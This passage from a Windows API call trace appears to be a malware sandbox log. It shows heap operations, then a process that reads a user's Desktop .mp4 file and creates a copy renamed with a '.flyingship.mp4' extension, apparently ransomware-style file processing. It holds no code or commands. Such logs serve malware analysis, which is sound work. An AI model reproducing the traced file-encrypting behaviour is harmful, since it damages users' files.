hHeap=0x8a0000) returned 1 [0168.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0168.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0168.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0168.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0168.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0168.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0168.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0168.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0168.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0168.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0168.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0168.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0168.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0168.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0168.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0168.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0168.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0168.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0168.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0168.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0168.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0168.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0168.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0168.527] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0168.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0168.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0168.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0168.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0168.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0168.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0168.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0168.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0168.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0168.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0168.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0168.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0168.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0168.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0168.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0168.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0168.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0168.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0168.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0168.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0168.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0168.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0168.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0168.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0168.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0168.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0168.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0168.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0168.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0168.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0168.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0168.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0168.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0168.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0168.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0168.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0168.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0168.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0168.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0168.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0168.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0168.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0168.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0168.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0168.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0168.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0168.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0168.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0168.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0168.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0168.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0168.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0168.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0168.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0168.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0168.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0168.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0168.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0168.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0168.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0168.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0168.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0168.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0168.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0168.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0168.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0168.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0168.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0168.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0168.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0168.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0168.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0168.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0168.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0168.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0168.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0168.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0168.530] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0168.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0168.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0168.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0168.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0168.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0168.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0168.530] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0168.530] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0168.530] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0168.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0168.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0168.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0168.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0168.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0168.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0168.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae58 [0168.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xa6b008 [0168.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0168.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0168.531] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_IlnDJr.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_ilndjr.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0168.531] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.531] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0168.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0168.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0168.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0168.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0168.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0168.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0168.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0168.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0168.532] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0168.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0168.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0168.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0168.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0168.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0168.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0168.532] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0168.532] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0168.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0168.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0168.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0168.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0168.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0168.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0168.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0168.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0168.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0168.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0168.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0168.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0168.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0168.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0168.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0168.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0168.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0168.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0168.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0168.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0168.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0168.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0168.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0168.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0168.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0168.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0168.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0168.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0168.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0168.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0168.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0168.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923ad0 [0168.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0168.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0168.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0168.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0168.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0168.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0168.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0168.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0168.537] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_IlnDJr.flyingship.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_ilndjr.flyingship.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0168.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0168.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0168.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0168.539] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0168.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0168.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0168.539] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.539] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0168.539] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0168.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0168.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0168.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0168.540] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0168.540] ReadFile (in: hFile=0x138, lpBuffer=0xa6b008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa6b008*, lpNumberOfBytesRead=0x87efb8*=0x7952, lpOverlapped=0x0) returned 1 [0168.542] ReadFile (in: hFile=0x138, lpBuffer=0xa6b008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa6b008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0168.542] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0168.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0168.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0168.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0168.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0168.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7952) returned 0xa7b010 [0168.543] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, 